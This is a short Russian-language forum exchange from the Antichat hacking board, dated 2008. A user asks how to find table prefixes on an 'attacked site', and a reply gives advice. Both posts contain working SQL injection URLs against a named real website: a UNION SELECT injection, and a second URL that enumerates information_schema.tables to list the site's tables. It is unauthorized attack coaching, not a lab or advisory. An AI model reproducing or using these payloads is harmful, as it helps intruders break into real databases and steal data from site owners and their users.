
14.08.2008, 17:10
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от viv
Привет всем
Подскажите как можно узнать префикс таблиц на атакуемом сайте?
вот ссылочка:http://www.hardvision.ru/index.php3 to=files&action=showCateg&cid=-233+union+select+1,2,3+from+har_user/*
там проходит sql инъекция , как ни пробовал по логики от названия сайта , не получается.
Может есть какие команды?
Там пятая ветка , вся информация в schema:
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,table_name,3+from+information_s chema.tables+limit+17,1/*
|
|
|